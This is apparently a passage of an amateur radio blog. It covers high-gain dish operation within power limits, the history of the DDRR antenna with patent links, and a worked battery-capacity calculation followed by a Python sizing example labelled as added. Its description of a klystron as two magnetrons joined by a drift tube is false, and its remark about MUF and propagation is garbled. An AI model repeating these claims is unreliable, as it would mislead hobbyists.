  • Transmitter Power Output Limit is 1.5 kW at the antenna
  • Unlimited antenna gain allowed
  • OET 65 must be complied with
  • Eight-foot dishes from C-band TVRO satellite dishes may be used with tripods or permanently mounted
  • Band choice is limited by antenna gain since transmitter power is limited at 1.5kW
  • Any band may be used if the propagation supports it (and the MUF does not)
  • Practical contacts have been made on 2m, 70cm, and up.
  • 70cm, 33cm, 23cm, 2.4GHz, 3.4GHz, and 5.6 - 5.9 GHz may be most useful depending on amplifier availability.
  • Modulation of a magnetron might be a possibility using phase shifters, but spectral purity requires improvement. A klystron is actually two magnetrons with a drift tube between them holding the electron beam in the focus coils.
  • Low S/N Ratio is not an issue for CW or narrow bandwidth SSB, ACSSB, AM-compatible SSB, or BPSK. Digital modes with FEC make this most useful.
  • Dual antennas or arrays may be most useful due to power levels present combined with sensitive receiver electronics. 
  • This mode is most useful in rural areas where urban noise is not present
  • Fine control of azimuth and elevation may be necessary as well as prior coordination of likely station locations and/or GPS coordinates to effectively establish communications. 
  • Limitations on amateur use are mostly related to transmit power limits, not antenna size, location, or number.
  • Workarounds for power limits may be deploying multiple transceiver sets at the same location or close by each other operating under the same callsign much like Field Day.
  • SSB and ACSSB carrying digital modes may be the best way to use this mode.

Safety is another factor; a ten-foot diameter Ku-band microwave dish weighs 900 lbs; a tower to hold such an object aloft is typically large and expensive.


The Untenna is a direct driven ring radiator (DDRR) which was manufactured in New York by ComRad Industries, Inc. I believe ComRad is out of business, but I may be wrong. Here is some information I found that I scanned from ComRad:

http://blog.catonic.us/kirby/DDRR/ComRadDDRRBW.pdf

It's not an antenna manual, but one can note that the antenna is simple in construction. It was invented by Dr. Joseph M Boyer and patented in 1964:

https://www.google.com/patents/US3151328
https://www.google.com/patents/US3247515
https://www.google.com/patents/US3680135

The antenna was published in 73 Magazine. I have pulled the JPGs from The Internet Archive Project and combined them into a single PDF linked below.

http://blog.catonic.us/kirby/DDRR/73BoyerDDRRAllParts.pdf

Surprisingly, this early horizontal antenna was cited:

https://www.google.com/patents/US2521550

The antenna shows up in the History of The Bell System, a multi-volume set of books illustrating technological achievements of the Bell Telephone Company.

Other information on the DDRR:

http://www.orionmicro.com/ant/ddrr/ddrr1.htm
http://www.orionmicro.com/ant/ddrr/ddrr2.htm

It appears the DDRR has been used for every imaginable purpose, including NVIS. It is somewhat related to the magnetic loop, which shares many aspects of the antenna.

If you're in need of ideas: https://www.google.com/search?q=ddrr+antenna

This is on the GROL exam, but...

If the duty cycle is 10%, and the radio draws one ampere on receive and twenty-five amperes on transmit, how much battery capacity is needed to provide support for twenty-four hours?


90% of the time, the radio will draw 1A.
10% of the time, the radio will draw 25A.

So the average then becomes:

Ia = (1 * 90%) + (25 * 10%)
Ia = (1 * 0.90) + (25 * 0.10)
Ia = 0.90 + 2.5
Ia = 3.4 A

Since the system will draw this more or less continuously, the battery should be sized accordingly. There are caveats however. Most batteries react negatively if the discharge rate is greater than 50% of the amp-hour rate. For instance, attempting to draw 100A out of a 100Ah battery for one hour will only result in a usable capacity of 50Ah. This is because of internal cell resistance.

Ia * time = capacity required
3.4A * 24h = 81.6Ah

Additional capacity should be provided so the battery is never fully discharged, and to cope with temperature extremes which limit the ability to both charge and discharge the battery.

If the discharge rate exceeds 50% of the battery capacity, derating (additional capacity) will be necessary to provide enough power to run the load.

Most batteries are specified on a twenty hour (20h) discharge cycle, not a twenty-four hour (24h) cycle. Therefore an additional 20% is required if calculating based on battery data; the 24h rate requires 120% the battery of the 20h rate for the same current draw, if using back of the envelope calculation. For calculations like the above, this issue is not considered because the time for discharge is defined.

A good safety margin is 125% - 250%. If 81.6Ah is required, 100Ah will allow for some reserve capacity, and 200Ah will allow for the temperature dropping below 60 degrees F or exceeding 85 degrees F.
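The sizing procedure above (duty-cycle average, amp-hours over the run time, the C/2 derating check, and the 125% to 250% margin) as an added example that is not part of the original post; it uses the post's own figures, and the choice to test the derating rule against the transmit peak current is an assumption made here.

```python
# Added example, not part of the original post: the duty-cycle battery
# sizing walked through above, with the post's own figures (1 A receive,
# 25 A transmit, 10% transmit duty cycle, 24 h run time, 125% to 250%
# margin). The "over C/2" derating check uses the transmit peak current
# as the worst-case discharge rate; that choice is an assumption here.

def average_current(rx_amps, tx_amps, tx_duty):
    """Time-weighted average draw: rx for (1 - duty), tx for duty."""
    if not 0.0 <= tx_duty <= 1.0:
        raise ValueError("transmit duty cycle must be between 0 and 1")
    return rx_amps * (1.0 - tx_duty) + tx_amps * tx_duty


def capacity_required_ah(avg_amps, hours):
    """Amp-hours consumed at the average draw over the run time."""
    return avg_amps * hours


def needs_derating(peak_amps, capacity_ah):
    """True when the discharge rate exceeds 50% of the Ah rating (C/2),
    the point at which the post says usable capacity falls off."""
    return peak_amps > 0.5 * capacity_ah


def size_battery(rx_amps, tx_amps, tx_duty, hours, margin=1.25):
    """Return the sizing figures for a battery bank with a safety margin
    (1.25 = 125%, the low end of the post's 125% to 250% range)."""
    if margin < 1.0:
        raise ValueError("margin below 100% would undersize the bank")
    avg = average_current(rx_amps, tx_amps, tx_duty)
    needed = capacity_required_ah(avg, hours)
    recommended = needed * margin
    return {
        "average_amps": avg,
        "required_ah": needed,
        "recommended_ah": recommended,
        # Derate further if the peak draw would pull the bank past C/2.
        "derate": needs_derating(tx_amps, recommended),
    }


if __name__ == "__main__":
    for m in (1.25, 2.5):
        r = size_battery(rx_amps=1.0, tx_amps=25.0, tx_duty=0.10,
                         hours=24, margin=m)
        print(f"margin {m:.2f}: avg {r['average_amps']:.2f} A, "
              f"need {r['required_ah']:.1f} Ah, "
              f"fit {r['recommended_ah']:.0f} Ah, derate={r['derate']}")
```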

Always remember to keep your batteries off the ground, and not sitting on a metal plate as coldsinking effectively removes capacity.

Additional resources:

http://www.norcalqrp.org/files/Batteries_and_Charging_Systems_KK6MC_whitepaper.pdf

http://www.industrial.panasonic.com/eu/i/00000/id_ni-mh_1104_e/id_ni-mh_1104_e.pdf
http://www.w4hh.org/solar%20power/solar%20page%201.htm